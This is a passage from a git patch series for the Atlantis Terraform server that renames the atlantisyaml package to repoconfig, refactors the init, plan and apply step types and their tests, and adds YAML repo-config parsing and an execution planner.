 rename server/events/{atlantisyaml => repoconfig}/init_step_test.go (87%)
 rename server/events/{atlantisyaml => repoconfig}/plan_step.go (80%)
 rename server/events/{atlantisyaml => repoconfig}/plan_step_test.go (90%)

diff --git a/server/events/atlantisyaml/init_step.go b/server/events/atlantisyaml/init_step.go
deleted file mode 100644
index a25cb94fe4..0000000000
--- a/server/events/atlantisyaml/init_step.go
+++ /dev/null
@@ -1,32 +0,0 @@
-package atlantisyaml
-
-import "github.com/hashicorp/go-version"
-
-// InitStep runs `terraform init`.
-type InitStep struct {
-	ExtraArgs         []string
-	TerraformExecutor TerraformExec
-	Meta              StepMeta
-}
-
-func (i *InitStep) Run() (string, error) {
-	// If we're running < 0.9 we have to use `terraform get` instead of `init`.
-	if MustConstraint("< 0.9.0").Check(i.Meta.TerraformVersion) {
-		i.Meta.Log.Info("running terraform version %s so will use `get` instead of `init`", i.Meta.TerraformVersion)
-		terraformGetCmd := append([]string{"get", "-no-color"}, i.ExtraArgs...)
-		_, err := i.TerraformExecutor.RunCommandWithVersion(i.Meta.Log, i.Meta.AbsolutePath, terraformGetCmd, i.Meta.TerraformVersion, i.Meta.Workspace)
-		return "", err
-	} else {
-		_, err := i.TerraformExecutor.RunCommandWithVersion(i.Meta.Log, i.Meta.AbsolutePath, append([]string{"init", "-no-color"}, i.ExtraArgs...), i.Meta.TerraformVersion, i.Meta.Workspace)
-		return "", err
-	}
-}
-
-// MustConstraint returns a constraint. It panics on error.
-func MustConstraint(constraint string) version.Constraints {
-	c, err := version.NewConstraint(constraint)
-	if err != nil {
-		panic(err)
-	}
-	return c
-}
diff --git a/server/events/atlantisyaml/apply_step.go b/server/events/repoconfig/apply_step.go
similarity index 62%
rename from server/events/atlantisyaml/apply_step.go
rename to server/events/repoconfig/apply_step.go
index c75d4ae3c2..d883c3a02c 100644
--- a/server/events/atlantisyaml/apply_step.go
+++ b/server/events/repoconfig/apply_step.go
@@ -1,19 +1,15 @@
-package atlantisyaml
+package repoconfig
 
 import (
 	"fmt"
 	"os"
 	"path/filepath"
-
-	"github.com/runatlantis/atlantis/server/events/vcs"
 )
 
 // ApplyStep runs `terraform apply`.
 type ApplyStep struct {
-	ExtraArgs         []string
-	VCSClient         vcs.ClientProxy
-	TerraformExecutor TerraformExec
-	Meta              StepMeta
+	ExtraArgs []string
+	Meta      StepMeta
 }
 
 func (a *ApplyStep) Run() (string, error) {
@@ -24,5 +20,5 @@ func (a *ApplyStep) Run() (string, error) {
 	}
 
 	tfApplyCmd := append(append(append([]string{"apply", "-no-color"}, a.ExtraArgs...), a.Meta.ExtraCommentArgs...), planPath)
-	return a.TerraformExecutor.RunCommandWithVersion(a.Meta.Log, a.Meta.AbsolutePath, tfApplyCmd, a.Meta.TerraformVersion, a.Meta.Workspace)
+	return a.Meta.TerraformExecutor.RunCommandWithVersion(a.Meta.Log, a.Meta.AbsolutePath, tfApplyCmd, a.Meta.TerraformVersion, a.Meta.Workspace)
 }
diff --git a/server/events/atlantisyaml/apply_step_test.go b/server/events/repoconfig/apply_step_test.go
similarity index 74%
rename from server/events/atlantisyaml/apply_step_test.go
rename to server/events/repoconfig/apply_step_test.go
index 0502ab2e1f..37e0af2f71 100644
--- a/server/events/atlantisyaml/apply_step_test.go
+++ b/server/events/repoconfig/apply_step_test.go
@@ -1,23 +1,22 @@
-package atlantisyaml_test
+package repoconfig_test
 
 import (
 	"io/ioutil"
-	"os"
 	"path/filepath"
 	"testing"
 
 	"github.com/hashicorp/go-version"
 	. "github.com/petergtz/pegomock"
-	"github.com/runatlantis/atlantis/server/events/atlantisyaml"
 	"github.com/runatlantis/atlantis/server/events/mocks/matchers"
+	"github.com/runatlantis/atlantis/server/events/repoconfig"
 	matchers2 "github.com/runatlantis/atlantis/server/events/run/mocks/matchers"
 	"github.com/runatlantis/atlantis/server/events/terraform/mocks"
 	. "github.com/runatlantis/atlantis/testing"
 )
 
 func TestRun_NoDir(t *testing.T) {
-	s := atlantisyaml.ApplyStep{
-		Meta: atlantisyaml.StepMeta{
+	s := repoconfig.ApplyStep{
+		Meta: repoconfig.StepMeta{
 			Workspace:             "workspace",
 			AbsolutePath:          "nonexistent/path",
 			DirRelativeToRepoRoot: ".",
@@ -31,11 +30,11 @@ func TestRun_NoDir(t *testing.T) {
 }
 
 func TestRun_NoPlanFile(t *testing.T) {
-	tmpDir, cleanup := tmpDir_stepTests(t)
+	tmpDir, cleanup := TempDir(t)
 	defer cleanup()
 
-	s := atlantisyaml.ApplyStep{
-		Meta: atlantisyaml.StepMeta{
+	s := repoconfig.ApplyStep{
+		Meta: repoconfig.StepMeta{
 			Workspace:             "workspace",
 			AbsolutePath:          tmpDir,
 			DirRelativeToRepoRoot: ".",
@@ -49,7 +48,7 @@ func TestRun_NoPlanFile(t *testing.T) {
 }
 
 func TestRun_Success(t *testing.T) {
-	tmpDir, cleanup := tmpDir_stepTests(t)
+	tmpDir, cleanup := TempDir(t)
 	defer cleanup()
 	planPath := filepath.Join(tmpDir, "workspace.tfplan")
 	err := ioutil.WriteFile(planPath, nil, 0644)
@@ -59,17 +58,17 @@ func TestRun_Success(t *testing.T) {
 	terraform := mocks.NewMockClient()
 
 	tfVersion, _ := version.NewVersion("0.11.4")
-	s := atlantisyaml.ApplyStep{
-		Meta: atlantisyaml.StepMeta{
+	s := repoconfig.ApplyStep{
+		Meta: repoconfig.StepMeta{
 			Workspace:             "workspace",
 			AbsolutePath:          tmpDir,
 			DirRelativeToRepoRoot: ".",
+			TerraformExecutor:     terraform,
 			TerraformVersion:      tfVersion,
 			ExtraCommentArgs:      []string{"comment", "args"},
 			Username:              "username",
 		},
-		ExtraArgs:         []string{"extra", "args"},
-		TerraformExecutor: terraform,
+		ExtraArgs: []string{"extra", "args"},
 	}
 
 	When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())).
@@ -79,11 +78,3 @@ func TestRun_Success(t *testing.T) {
 	Equals(t, "output", output)
 	terraform.VerifyWasCalledOnce().RunCommandWithVersion(nil, tmpDir, []string{"apply", "-no-color", "extra", "args", "comment", "args", planPath}, tfVersion, "workspace")
 }
-
-// tmpDir_stepTests creates a temporary directory and returns its path along
-// with a cleanup function to be called via defer.
-func tmpDir_stepTests(t *testing.T) (string, func()) {
-	tmpDir, err := ioutil.TempDir("", "")
-	Ok(t, err)
-	return tmpDir, func() { os.RemoveAll(tmpDir) }
-}
diff --git a/server/events/repoconfig/init_step.go b/server/events/repoconfig/init_step.go
new file mode 100644
index 0000000000..022399c4fb
--- /dev/null
+++ b/server/events/repoconfig/init_step.go
@@ -0,0 +1,20 @@
+package repoconfig
+
+// InitStep runs `terraform init`.
+type InitStep struct {
+	ExtraArgs []string
+	Meta      StepMeta
+}
+
+func (i *InitStep) Run() (string, error) {
+	// If we're running < 0.9 we have to use `terraform get` instead of `init`.
+	if MustConstraint("< 0.9.0").Check(i.Meta.TerraformVersion) {
+		i.Meta.Log.Info("running terraform version %s so will use `get` instead of `init`", i.Meta.TerraformVersion)
+		terraformGetCmd := append([]string{"get", "-no-color"}, i.ExtraArgs...)
+		_, err := i.Meta.TerraformExecutor.RunCommandWithVersion(i.Meta.Log, i.Meta.AbsolutePath, terraformGetCmd, i.Meta.TerraformVersion, i.Meta.Workspace)
+		return "", err
+	} else {
+		_, err := i.Meta.TerraformExecutor.RunCommandWithVersion(i.Meta.Log, i.Meta.AbsolutePath, append([]string{"init", "-no-color"}, i.ExtraArgs...), i.Meta.TerraformVersion, i.Meta.Workspace)
+		return "", err
+	}
+}
diff --git a/server/events/atlantisyaml/init_step_test.go b/server/events/repoconfig/init_step_test.go
similarity index 87%
rename from server/events/atlantisyaml/init_step_test.go
rename to server/events/repoconfig/init_step_test.go
index 8704f832df..1996e18d18 100644
--- a/server/events/atlantisyaml/init_step_test.go
+++ b/server/events/repoconfig/init_step_test.go
@@ -1,12 +1,12 @@
-package atlantisyaml_test
+package repoconfig_test
 
 import (
 	"testing"
 
 	"github.com/hashicorp/go-version"
 	. "github.com/petergtz/pegomock"
-	"github.com/runatlantis/atlantis/server/events/atlantisyaml"
 	"github.com/runatlantis/atlantis/server/events/mocks/matchers"
+	"github.com/runatlantis/atlantis/server/events/repoconfig"
 	matchers2 "github.com/runatlantis/atlantis/server/events/run/mocks/matchers"
 	"github.com/runatlantis/atlantis/server/events/terraform/mocks"
 	"github.com/runatlantis/atlantis/server/logging"
@@ -43,18 +43,18 @@ func TestRun_UsesGetOrInitForRightVersion(t *testing.T) {
 
 			tfVersion, _ := version.NewVersion(c.version)
 			logger := logging.NewNoopLogger()
-			s := atlantisyaml.InitStep{
-				Meta: atlantisyaml.StepMeta{
+			s := repoconfig.InitStep{
+				Meta: repoconfig.StepMeta{
 					Log:                   logger,
 					Workspace:             "workspace",
 					AbsolutePath:          "/path",
 					DirRelativeToRepoRoot: ".",
 					TerraformVersion:      tfVersion,
+					TerraformExecutor:     terraform,
 					ExtraCommentArgs:      []string{"comment", "args"},
 					Username:              "username",
 				},
-				ExtraArgs:         []string{"extra", "args"},
-				TerraformExecutor: terraform,
+				ExtraArgs: []string{"extra", "args"},
 			}
 
 			When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())).
diff --git a/server/events/atlantisyaml/plan_step.go b/server/events/repoconfig/plan_step.go
similarity index 80%
rename from server/events/atlantisyaml/plan_step.go
rename to server/events/repoconfig/plan_step.go
index 646506381b..6e7df0db0b 100644
--- a/server/events/atlantisyaml/plan_step.go
+++ b/server/events/repoconfig/plan_step.go
@@ -1,4 +1,4 @@
-package atlantisyaml
+package repoconfig
 
 import (
 	"fmt"
@@ -14,9 +14,8 @@ const defaultWorkspace = "default"
 
 // PlanStep runs `terraform plan`.
 type PlanStep struct {
-	ExtraArgs         []string
-	TerraformExecutor TerraformExec
-	Meta              StepMeta
+	ExtraArgs []string
+	Meta      StepMeta
 }
 
 func (p *PlanStep) Run() (string, error) {
@@ -42,7 +41,7 @@ func (p *PlanStep) Run() (string, error) {
 		tfPlanCmd = append(tfPlanCmd, "-var-file", optionalEnvFile)
 	}
 
-	return p.TerraformExecutor.RunCommandWithVersion(p.Meta.Log, filepath.Join(p.Meta.AbsolutePath), tfPlanCmd, p.Meta.TerraformVersion, p.Meta.Workspace)
+	return p.Meta.TerraformExecutor.RunCommandWithVersion(p.Meta.Log, filepath.Join(p.Meta.AbsolutePath), tfPlanCmd, p.Meta.TerraformVersion, p.Meta.Workspace)
 }
 
 // switchWorkspace changes the terraform workspace if necessary and will create
@@ -68,7 +67,7 @@ func (p *PlanStep) switchWorkspace() error {
 	// already in the right workspace then no need to switch. This will save us
 	// about ten seconds. This command is only available in > 0.10.
 	if !runningZeroPointNine {
-		workspaceShowOutput, err := p.TerraformExecutor.RunCommandWithVersion(p.Meta.Log, p.Meta.AbsolutePath, []string{workspaceCmd, "show"}, p.Meta.TerraformVersion, p.Meta.Workspace)
+		workspaceShowOutput, err := p.Meta.TerraformExecutor.RunCommandWithVersion(p.Meta.Log, p.Meta.AbsolutePath, []string{workspaceCmd, "show"}, p.Meta.TerraformVersion, p.Meta.Workspace)
 		if err != nil {
 			return err
 		}
@@ -83,11 +82,11 @@ func (p *PlanStep) switchWorkspace() error {
 	// we can create it if it doesn't. To do this we can either select and catch
 	// the error or use list and then look for the workspace. Both commands take
 	// the same amount of time so that's why we're running select here.
-	_, err := p.TerraformExecutor.RunCommandWithVersion(p.Meta.Log, p.Meta.AbsolutePath, []string{workspaceCmd, "select", "-no-color", p.Meta.Workspace}, p.Meta.TerraformVersion, p.Meta.Workspace)
+	_, err := p.Meta.TerraformExecutor.RunCommandWithVersion(p.Meta.Log, p.Meta.AbsolutePath, []string{workspaceCmd, "select", "-no-color", p.Meta.Workspace}, p.Meta.TerraformVersion, p.Meta.Workspace)
 	if err != nil {
 		// If terraform workspace select fails we run terraform workspace
 		// new to create a new workspace automatically.
-		_, err = p.TerraformExecutor.RunCommandWithVersion(p.Meta.Log, p.Meta.AbsolutePath, []string{workspaceCmd, "new", "-no-color", p.Meta.Workspace}, p.Meta.TerraformVersion, p.Meta.Workspace)
+		_, err = p.Meta.TerraformExecutor.RunCommandWithVersion(p.Meta.Log, p.Meta.AbsolutePath, []string{workspaceCmd, "new", "-no-color", p.Meta.Workspace}, p.Meta.TerraformVersion, p.Meta.Workspace)
 		return err
 	}
 	return nil
diff --git a/server/events/atlantisyaml/plan_step_test.go b/server/events/repoconfig/plan_step_test.go
similarity index 90%
rename from server/events/atlantisyaml/plan_step_test.go
rename to server/events/repoconfig/plan_step_test.go
index d5d7502992..7e9e8b1f22 100644
--- a/server/events/atlantisyaml/plan_step_test.go
+++ b/server/events/repoconfig/plan_step_test.go
@@ -1,4 +1,4 @@
-package atlantisyaml_test
+package repoconfig_test
 
 import (
 	"errors"
@@ -9,8 +9,8 @@ import (
 
 	"github.com/hashicorp/go-version"
 	. "github.com/petergtz/pegomock"
-	"github.com/runatlantis/atlantis/server/events/atlantisyaml"
 	"github.com/runatlantis/atlantis/server/events/mocks/matchers"
+	"github.com/runatlantis/atlantis/server/events/repoconfig"
 	matchers2 "github.com/runatlantis/atlantis/server/events/run/mocks/matchers"
 	"github.com/runatlantis/atlantis/server/events/terraform/mocks"
 	"github.com/runatlantis/atlantis/server/logging"
@@ -25,18 +25,18 @@ func TestRun_NoWorkspaceIn08(t *testing.T) {
 	tfVersion, _ := version.NewVersion("0.8")
 	logger := logging.NewNoopLogger()
 	workspace := "default"
-	s := atlantisyaml.PlanStep{
-		Meta: atlantisyaml.StepMeta{
+	s := repoconfig.PlanStep{
+		Meta: repoconfig.StepMeta{
 			Log:                   logger,
 			Workspace:             workspace,
 			AbsolutePath:          "/path",
 			DirRelativeToRepoRoot: ".",
+			TerraformExecutor:     terraform,
 			TerraformVersion:      tfVersion,
 			ExtraCommentArgs:      []string{"comment", "args"},
 			Username:              "username",
 		},
-		ExtraArgs:         []string{"extra", "args"},
-		TerraformExecutor: terraform,
+		ExtraArgs: []string{"extra", "args"},
 	}
 
 	When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())).
@@ -61,18 +61,18 @@ func TestRun_ErrWorkspaceIn08(t *testing.T) {
 	tfVersion, _ := version.NewVersion("0.8")
 	logger := logging.NewNoopLogger()
 	workspace := "notdefault"
-	s := atlantisyaml.PlanStep{
-		Meta: atlantisyaml.StepMeta{
+	s := repoconfig.PlanStep{
+		Meta: repoconfig.StepMeta{
 			Log:                   logger,
 			Workspace:             workspace,
 			AbsolutePath:          "/path",
 			DirRelativeToRepoRoot: ".",
+			TerraformExecutor:     terraform,
 			TerraformVersion:      tfVersion,
 			ExtraCommentArgs:      []string{"comment", "args"},
 			Username:              "username",
 		},
-		ExtraArgs:         []string{"extra", "args"},
-		TerraformExecutor: terraform,
+		ExtraArgs: []string{"extra", "args"},
 	}
 
 	When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())).
@@ -112,18 +112,18 @@ func TestRun_SwitchesWorkspace(t *testing.T) {
 
 			tfVersion, _ := version.NewVersion(c.tfVersion)
 			logger := logging.NewNoopLogger()
-			s := atlantisyaml.PlanStep{
-				Meta: atlantisyaml.StepMeta{
+			s := repoconfig.PlanStep{
+				Meta: repoconfig.StepMeta{
 					Log:                   logger,
 					Workspace:             "workspace",
 					AbsolutePath:          "/path",
 					DirRelativeToRepoRoot: ".",
+					TerraformExecutor:     terraform,
 					TerraformVersion:      tfVersion,
 					ExtraCommentArgs:      []string{"comment", "args"},
 					Username:              "username",
 				},
-				ExtraArgs:         []string{"extra", "args"},
-				TerraformExecutor: terraform,
+				ExtraArgs: []string{"extra", "args"},
 			}
 
 			When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())).
@@ -170,18 +170,18 @@ func TestRun_CreatesWorkspace(t *testing.T) {
 			terraform := mocks.NewMockClient()
 			tfVersion, _ := version.NewVersion(c.tfVersion)
 			logger := logging.NewNoopLogger()
-			s := atlantisyaml.PlanStep{
-				Meta: atlantisyaml.StepMeta{
+			s := repoconfig.PlanStep{
+				Meta: repoconfig.StepMeta{
 					Log:                   logger,
 					Workspace:             "workspace",
 					AbsolutePath:          "/path",
 					DirRelativeToRepoRoot: ".",
+					TerraformExecutor:     terraform,
 					TerraformVersion:      tfVersion,
 					ExtraCommentArgs:      []string{"comment", "args"},
 					Username:              "username",
 				},
-				ExtraArgs:         []string{"extra", "args"},
-				TerraformExecutor: terraform,
+				ExtraArgs: []string{"extra", "args"},
 			}
 
 			// Ensure that we actually try to switch workspaces by making the
@@ -212,18 +212,18 @@ func TestRun_NoWorkspaceSwitchIfNotNecessary(t *testing.T) {
 	terraform := mocks.NewMockClient()
 	tfVersion, _ := version.NewVersion("0.10.0")
 	logger := logging.NewNoopLogger()
-	s := atlantisyaml.PlanStep{
-		Meta: atlantisyaml.StepMeta{
+	s := repoconfig.PlanStep{
+		Meta: repoconfig.StepMeta{
 			Log:                   logger,
 			Workspace:             "workspace",
 			AbsolutePath:          "/path",
 			DirRelativeToRepoRoot: ".",
+			TerraformExecutor:     terraform,
 			TerraformVersion:      tfVersion,
 			ExtraCommentArgs:      []string{"comment", "args"},
 			Username:              "username",
 		},
-		ExtraArgs:         []string{"extra", "args"},
-		TerraformExecutor: terraform,
+		ExtraArgs: []string{"extra", "args"},
 	}
 
 	When(terraform.RunCommandWithVersion(logger, "/path", []string{"workspace", "show"}, tfVersion, "workspace")).ThenReturn("workspace\n", nil)
@@ -247,7 +247,7 @@ func TestRun_AddsEnvVarFile(t *testing.T) {
 	terraform := mocks.NewMockClient()
 
 	// Create the env/workspace.tfvars file.
-	tmpDir, cleanup := tmpDir_stepTests(t)
+	tmpDir, cleanup := TempDir(t)
 	defer cleanup()
 	err := os.MkdirAll(filepath.Join(tmpDir, "env"), 0700)
 	Ok(t, err)
@@ -258,18 +258,18 @@ func TestRun_AddsEnvVarFile(t *testing.T) {
 	// Using version >= 0.10 here so we don't expect any env commands.
 	tfVersion, _ := version.NewVersion("0.10.0")
 	logger := logging.NewNoopLogger()
-	s := atlantisyaml.PlanStep{
-		Meta: atlantisyaml.StepMeta{
+	s := repoconfig.PlanStep{
+		Meta: repoconfig.StepMeta{
 			Log:                   logger,
 			Workspace:             "workspace",
 			AbsolutePath:          tmpDir,
 			DirRelativeToRepoRoot: ".",
+			TerraformExecutor:     terraform,
 			TerraformVersion:      tfVersion,
 			ExtraCommentArgs:      []string{"comment", "args"},
 			Username:              "username",
 		},
-		ExtraArgs:         []string{"extra", "args"},
-		TerraformExecutor: terraform,
+		ExtraArgs: []string{"extra", "args"},
 	}
 
 	expPlanArgs := []string{"plan", "-refresh", "-no-color", "-out", filepath.Join(tmpDir, "workspace.tfplan"), "-var", "atlantis_user=username", "extra", "args", "comment", "args", "-var-file", envVarsFile}

From 7dfab213e8d84a1984da7ff75abf26fe55fc71d2 Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Tue, 5 Jun 2018 17:23:58 +0100
Subject: [PATCH 09/69] Parse config and build execution plan.

---
 server/events/repoconfig/config.go            | 188 ++++++++++++++++++
 server/events/repoconfig/execution_planner.go | 144 ++++++++++++++
 server/events/repoconfig/repoconfig.go        |  87 ++++++++
 testing/assertions.go                         |   2 +-
 4 files changed, 420 insertions(+), 1 deletion(-)
 create mode 100644 server/events/repoconfig/config.go
 create mode 100644 server/events/repoconfig/execution_planner.go
 create mode 100644 server/events/repoconfig/repoconfig.go

diff --git a/server/events/repoconfig/config.go b/server/events/repoconfig/config.go
new file mode 100644
index 0000000000..48a0a9e388
--- /dev/null
+++ b/server/events/repoconfig/config.go
@@ -0,0 +1,188 @@
+package repoconfig
+
+import "fmt"
+
+type RepoConfig struct {
+	Version   int                 `yaml:"version"`
+	Projects  []Project           `yaml:"projects"`
+	Workflows map[string]Workflow `yaml:"workflows"`
+}
+
+type Project struct {
+	Dir               string    `yaml:"dir"`
+	Workspace         string    `yaml:"workspace"`
+	Workflow          string    `yaml:"workflow"`
+	TerraformVersion  string    `yaml:"terraform_version"`
+	AutoPlan          *AutoPlan `yaml:"auto_plan,omitempty"`
+	ApplyRequirements []string  `yaml:"apply_requirements"`
+}
+
+func (p *Project) UnmarshalYAML(unmarshal func(interface{}) error) error {
+	// Use a type alias so unmarshal doesn't get into an infinite loop.
+	type alias Project
+	// Set up defaults.
+	defaults := alias{
+		Workspace: defaultWorkspace,
+		AutoPlan: &AutoPlan{
+			Enabled:      true,
+			WhenModified: []string{"**/*.tf"},
+		},
+	}
+	if err := unmarshal(&defaults); err != nil {
+		return err
+	}
+	*p = Project(defaults)
+	return nil
+}
+
+type AutoPlan struct {
+	WhenModified []string `yaml:"when_modified"`
+	Enabled      bool     `yaml:"enabled"` // defaults to true
+}
+
+func (a *AutoPlan) UnmarshalYAML(unmarshal func(interface{}) error) error {
+	// Use a type alias so unmarshal doesn't get into an infinite loop.
+	type alias AutoPlan
+	// Set up defaults.
+	defaults := alias{
+		// If not specified, we assume it's enabled.
+		Enabled: true,
+	}
+	if err := unmarshal(&defaults); err != nil {
+		return err
+	}
+	*a = AutoPlan(defaults)
+	return nil
+}
+
+type Workflow struct {
+	Apply *Stage `yaml:"apply"` // defaults to regular apply steps
+	Plan  *Stage `yaml:"plan"`  // defaults to regular plan steps
+}
+
+func (p *Workflow) UnmarshalYAML(unmarshal func(interface{}) error) error {
+	// Use a type alias so unmarshal doesn't get into an infinite loop.
+	type alias Workflow
+	var tmp alias
+	if err := unmarshal(&tmp); err != nil {
+		return err
+	}
+	*p = Workflow(tmp)
+
+	// If plan or apply keys aren't specified we use the default workflow.
+	if p.Apply == nil {
+		p.Apply = &Stage{
+			[]StepConfig{
+				{
+					StepType: "apply",
+				},
+			},
+		}
+	}
+
+	if p.Plan == nil {
+		p.Plan = &Stage{
+			[]StepConfig{
+				{
+					StepType: "init",
+				},
+				{
+					StepType: "plan",
+				},
+			},
+		}
+	}
+
+	return nil
+}
+
+type Stage struct {
+	Steps []StepConfig `yaml:"steps"` // can either be a built in step like 'plan' or a custom step like 'run: echo hi'
+}
+
+type StepConfig struct {
+	StepType  string
+	ExtraArgs []string
+}
+
+func (s *StepConfig) UnmarshalYAML(unmarshal func(interface{}) error) error {
+	// First try to unmarshal as a single string, ex.
+	// steps:
+	// - init
+	// - plan
+	var singleString string
+	err := unmarshal(&singleString)
+	if err == nil {
+		if singleString != "init" && singleString != "plan" && singleString != "apply" {
+			return fmt.Errorf("unsupported step type: %q", singleString)
+		}
+		s.StepType = singleString
+		return nil
+	}
+
+	// Next, try to unmarshal as a built-in command with extra_args set, ex.
+	// steps:
+	// - init:
+	///    extra_args: ["arg1"]
+	//
+	// We need to create a struct for each step so go-yaml knows to call into
+	// our routine based on the key (ex. init, plan, etc).
+	// We use a map[string]interface{} as the value so we can manually
+	// validate key names and return better errors. This is instead of:
+	//    Init struct{
+	//    	ExtraArgs []string `yaml:"extra_args"`
+	//    } `yaml:"init"`
+
+	validateBuiltIn := func(stepType string, args map[string]interface{}) error {
+		s.StepType = stepType
+		for k, v := range args {
+			if k != "extra_args" {
+				return fmt.Errorf("unsupported key %q for step %s – the only supported key is extra_args", k, stepType)
+			}
+
+			// parse as []string
+			val, ok := v.([]interface{})
+			if !ok {
+				return fmt.Errorf("expected array of strings as value of extra_args, not %q", v)
+			}
+			var finalVals []string
+			for _, i := range val {
+				finalVals = append(finalVals, fmt.Sprintf("%s", i))
+			}
+			s.ExtraArgs = finalVals
+		}
+		return nil
+	}
+	var initStep struct {
+		Init map[string]interface{} `yaml:"init"`
+	}
+	if err = unmarshal(&initStep); err == nil {
+		return validateBuiltIn("init", initStep.Init)
+	}
+
+	var planStep struct {
+		Plan map[string]interface{} `yaml:"plan"`
+	}
+	if err = unmarshal(&planStep); err == nil {
+		return validateBuiltIn("plan", planStep.Plan)
+	}
+
+	var applyStep struct {
+		Apply map[string]interface{} `yaml:"apply"`
+	}
+	if err = unmarshal(&applyStep); err == nil {
+		return validateBuiltIn("apply", applyStep.Apply)
+	}
+
+	// todo: run step
+	// Try to unmarshal as a custom run step, ex.
+	// steps:
+	// - run: my command
+	//var runStep struct {
+	//	Run string `yaml:"run"`
+	//}
+	//if err = unmarshal(&runStep); err == nil {
+	//
+	//}
+	return err
+}
diff --git a/server/events/repoconfig/execution_planner.go b/server/events/repoconfig/execution_planner.go
new file mode 100644
index 0000000000..02cba0496f
--- /dev/null
+++ b/server/events/repoconfig/execution_planner.go
@@ -0,0 +1,144 @@
+package repoconfig
+
+import (
+	"fmt"
+	"path/filepath"
+
+	"github.com/hashicorp/go-version"
+	"github.com/runatlantis/atlantis/server/logging"
+)
+
+type ExecutionPlanner struct {
+	TerraformExecutor TerraformExec
+	DefaultTFVersion  *version.Version
+	ConfigReader      *Reader
+}
+
+type TerraformExec interface {
+	RunCommandWithVersion(log *logging.SimpleLogger, path string, args []string, v *version.Version, workspace string) (string, error)
+}
+
+func (s *ExecutionPlanner) BuildPlanStage(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) (*PlanStage, error) {
+	defaults := s.defaultPlanSteps(log, repoDir, workspace, relProjectPath, extraCommentArgs, username)
+	steps, err := s.buildStage(PlanStageName, log, repoDir, workspace, relProjectPath, extraCommentArgs, username, defaults)
+	if err != nil {
+		return nil, err
+	}
+	return &PlanStage{
+		Steps: steps,
+	}, nil
+}
+
+func (s *ExecutionPlanner) buildStage(stageName string, log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string, defaults []Step) ([]Step, error) {
+	config, err := s.ConfigReader.ReadConfig(repoDir)
+	if err != nil {
+		return nil, err
+	}
+
+	// If there's no config file, use defaults.
+	if config == nil {
+		log.Info("no %s file found––continuing with defaults", AtlantisYAMLFilename)
+		return defaults, nil
+	}
+
+	// Get this project's configuration.
+	for _, p := range config.Projects {
+		if p.Dir == relProjectPath && p.Workspace == workspace {
+			workflowName := p.Workflow
+
+			// If they didn't specify a workflow, use the default.
+			if workflowName == "" {
+				log.Info("no %s workflow set––continuing with defaults", AtlantisYAMLFilename)
+				return defaults, nil
+			}
+
+			// If they did specify a workflow, find it.
+			workflow, exists := config.Workflows[workflowName]
+			if !exists {
+				return nil, fmt.Errorf("no workflow with key %q defined", workflowName)
+			}
+
+			// We have a workflow defined, so now we need to build it.
+			meta := s.buildMeta(log, repoDir, workspace, relProjectPath, extraCommentArgs, username)
+			var steps []Step
+			var stepsConfig []StepConfig
+			if stageName == PlanStageName {
+				stepsConfig = workflow.Plan.Steps
+			} else {
+				stepsConfig = workflow.Apply.Steps
+			}
+			for _, stepConfig := range stepsConfig {
+				var step Step
+				switch stepConfig.StepType {
+				case "init":
+					step = &InitStep{
+						Meta:      meta,
+						ExtraArgs: stepConfig.ExtraArgs,
+					}
+				case "plan":
+					step = &PlanStep{
+						Meta:      meta,
+						ExtraArgs: stepConfig.ExtraArgs,
+					}
+				case "apply":
+					step = &ApplyStep{
+						Meta:      meta,
+						ExtraArgs: stepConfig.ExtraArgs,
+					}
+				}
+				// todo: custom step
+				steps = append(steps, step)
+			}
+			return steps, nil
+		}
+	}
+	return nil, fmt.Errorf("no project with dir %q and workspace %q defined", relProjectPath, workspace)
+}
+
+func (s *ExecutionPlanner) BuildApplyStage(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) (*ApplyStage, error) {
+	defaults := s.defaultApplySteps(log, repoDir, workspace, relProjectPath, extraCommentArgs, username)
+	steps, err := s.buildStage(ApplyStageName, log, repoDir, workspace, relProjectPath, extraCommentArgs, username, defaults)
+	if err != nil {
+		return nil, err
+	}
+	return &ApplyStage{
+		Steps: steps,
+	}, nil
+}
+
+func (s *ExecutionPlanner) buildMeta(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) StepMeta {
+	return StepMeta{
+		Log:                   log,
+		Workspace:             workspace,
+		AbsolutePath:          filepath.Join(repoDir, relProjectPath),
+		DirRelativeToRepoRoot: relProjectPath,
+		// If there's no config then we should use the default tf version.
+		TerraformVersion:  s.DefaultTFVersion,
+		TerraformExecutor: s.TerraformExecutor,
+		ExtraCommentArgs:  extraCommentArgs,
+		Username:          username,
+	}
+}
+
+func (s *ExecutionPlanner) defaultPlanSteps(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) []Step {
+	meta := s.buildMeta(log, repoDir, workspace, relProjectPath, extraCommentArgs, username)
+	return []Step{
+		&InitStep{
+			ExtraArgs: nil,
+			Meta:      meta,
+		},
+		&PlanStep{
+			ExtraArgs: nil,
+			Meta:      meta,
+		},
+	}
+}
+func (s *ExecutionPlanner) defaultApplySteps(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) []Step {
+	meta := s.buildMeta(log, repoDir, workspace, relProjectPath, extraCommentArgs, username)
+	return []Step{
+		&ApplyStep{
+			ExtraArgs: nil,
+			Meta:      meta,
+		},
+	}
+}
diff --git a/server/events/repoconfig/repoconfig.go b/server/events/repoconfig/repoconfig.go
new file mode 100644
index 0000000000..6d71d7de0d
--- /dev/null
+++ b/server/events/repoconfig/repoconfig.go
@@ -0,0 +1,87 @@
+package repoconfig
+
+import (
